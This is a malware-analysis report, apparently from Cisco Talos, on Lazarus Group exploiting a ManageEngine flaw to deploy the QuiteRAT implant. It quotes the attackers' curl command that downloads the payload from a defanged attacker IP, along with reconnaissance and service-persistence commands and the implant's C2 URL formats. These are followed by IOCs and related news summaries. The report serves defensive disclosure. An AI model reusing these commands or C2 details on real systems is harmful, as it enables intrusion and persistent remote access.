Security
Headlines
HeadlinesLatestCVEs

Headline

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.

TALOS
#vulnerability#web#mac#windows#apple#amazon#cisco#git#java#php#c++#auth#firefox

Thursday, August 24, 2023 08:08

  • Cisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone infrastructure and healthcare entities in Europe and the United States. This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.

  • In this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware threat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has been written on it since then.

  • QuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its file size is significantly smaller. Both implants are built on the Qt framework and include capabilities such as arbitrary command execution.

  • Lazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.

**Lazarus Group compromises internet backbone infrastructure company in Europe
**

In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in Europe to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access. The successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to immediately deploy the QuiteRAT binary from a malicious URL:

curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

The IP address 146[.]4[.]21[.]94 has been used by Lazarus since at least May 2022.

A successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting in the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary system information to its command and control (C2) servers and then waits on the C2 to respond with either a command code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process. Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:

Command

Intent

C:\windows\system32\cmd.exe /c systeminfo | findstr Logon

Get logon server name (machine name). System Information Discovery [T1082]

C:\windows\system32\cmd.exe /c ipconfig | findstr Suffix

Domain name for the system. Domain discovery [T1087/002]

There is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by issuing the following command to QuiteRAT:

C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe

A typical infection chain looks like this:

Lazarus Group evolves malicious arsenal with QuiteRAT

QuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt libraries along with some user-written code. The Qt framework is a platform for developing cross-platform applications. However, it is immensely popular for developing Graphical User Interface in applications. Although QuiteRAT, just like MagicRAT, uses embedded Qt libraries, none of these implants have a Graphical User Interface. .As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity, making human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less reliable, since Qt is rarely used in malware development.

Based on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this implant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s report from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) — which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.

The implant initially gathers some rudimentary information about the infected endpoint, including MAC addresses, IP addresses, and the current user name of the device. This information is then arranged in the format:

<MAC_address><IP_address>[0];<MAC_address><IP_address>[1];…<MAC_address><IP_address>[n];<username>

The resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim identifier) while conversing with the C2 server.

All the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and stored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with WithSecure’s analysis from earlier this year.

Configuration strings encoded in the malware.

The URL to communicate with the C2 is constructed as follows with the following extended URI parameters:

Parameter names

Values

Description

mailid

<12 chars from MD4>

The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)

action

“inbox” = send check beacon
“sent” = data is being sent to C2

Signifies the action being taken

body

<base64_xorred_data>

Data to be sent to C2.

param

<Internal/Local IP address>

The internal/LAN IP address of the infected endpoint.

session

<rand>

Pseudo-random number generated by the implant.

The URL for the HTTP GET to obtain inputs from the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&action=inbox&param=<Internal/Local_IP_address>&session=<rand>

Data is also sent to the C2 using the HTTP GET VERB as well. The URL for the HTTP GET to send data to the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&action=sent&body=<base64_xorred_data>param=<Internal/Local_IP_address>&session=<rand>

Any data sent to the C2 is utmost 0x400 (1,024) bytes in length. If the output of a command executed on the endpoint by the implant is larger than 1,024 bytes, the implant appends the < No Pineapple! > marker at the end of the data.

The User-Agent used during communications by the implant is

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

The malware also has the ability to run a ping command on a random IP address that it generates on the fly. The request is usually executed using the command <compspec_path>\cmd.exe /c <IP_Address> -n 18 &:

Ping command being constructed by the implant including the octets for a random IP.

The implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This value is then used by the implant to Sleep for a specific period of time (in minutes) before it begins talking to the C2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of time while ensuring continued access to the compromised enterprise network.

The implant also has the ability to receive a second URL from the current C2 server via the command code receivemail. The implant will then reach out to the second URL to receive commands and payloads from the server to execute on the infected system.

We have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at this time, which is included in the IOCs section:

QuiteRAT binary name

Compile date

notify.exe (32bit)

May 30, 2022

acres.exe

July 22, 2022

acres.exe (64bit)

July 25, 2022

The latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022. This is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT, beginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based implant.

QuiteRAT vs MagicRAT

QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size. This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued operation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.

There are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from being built on the Qt framework, both implants consist of the same abilities, including running arbitrary commands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an additional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings automatically. Additionally, both implants use similar functionality to allow them to remain dormant on the endpoint by specifying a sleep period for them by the C2 server.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

IOCs for this research can also be found at our Github repository here.

Hashes
****QuiteRAT

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6

**Networks IOCs
**

146[.]4[.]21[.]94

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php

hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php

Related news

Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors

Iranian nation-state actors have been conducting password spray attacks against thousands of organizations globally between February and July 2023, new findings from Microsoft reveal. The tech giant, which is tracking the activity under the name Peach Sandstorm (formerly Holmium), said the adversary pursued organizations in the satellite, defense, and pharmaceutical sectors to likely facilitate

Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware

The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called such as QuiteRAT. Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis

Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems

An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 to mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align

Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access

Zoho ManageEngine Endpoint Central / MSP 10.1.2228.10 Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10 and below (CVE-2022-47966). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the Endpoint Central SAML endpoint. Note that the target is only vulnerable if it is configured with SAML-based SSO, and the service should be active.

ManageEngine ADSelfService Plus Unauthenticated SAML Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine AdSelfService Plus versions 6210 and below. Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ADSelfService Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Zoho ManageEngine ServiceDesk Plus 14003 Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (CVE-2022-47966). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Unpatched Zoho MangeEngine Products Under Active Cyberattack

The latest critical bug is exploitable in dozens of ManageEngine products and exposes systems to catastrophic risks, researchers warn.

Zoho ManageEngine PoC Exploit to be Released Soon - Patch Before It's Too Late!

Users of Zoho ManageEngine are being urged to patch their instances against a critical security vulnerability ahead of the release of a proof-of-concept (PoC) exploit code. The issue in question is CVE-2022-47966, an unauthenticated remote code execution vulnerability affecting several products due to the use of an outdated third-party dependency, Apache Santuario. "This vulnerability allows an

Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability

Categories: Exploits and vulnerabilities Categories: News Tags: Zoho Tags: ManageEngine Tags: PoC Tags: RCE Tags: CVE-2022-47966 Tags: CVE-2022-35405 Tags: SAML Tags: Apache Santuario Proof of Concept code is about to be released for a vulnerability in many ManageEngine products which could enable RCE with SYSTEM privileges. (Read more...) The post Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability appeared first on Malwarebytes Labs.

CVE-2019-19034: AssetExplorer ITAM Solution ServicePacks Readme

Zoho ManageEngine Asset Explorer 6.5 does not validate the System Center Configuration Manager (SCCM) database username when dynamically generating a command to schedule scans for SCCM. This allows an attacker to execute arbitrary commands on the AssetExplorer Server with NT AUTHORITY/SYSTEM privileges.

TALOS: Latest News

NVIDIA shader out-of-bounds and eleven LevelOne router vulnerabilities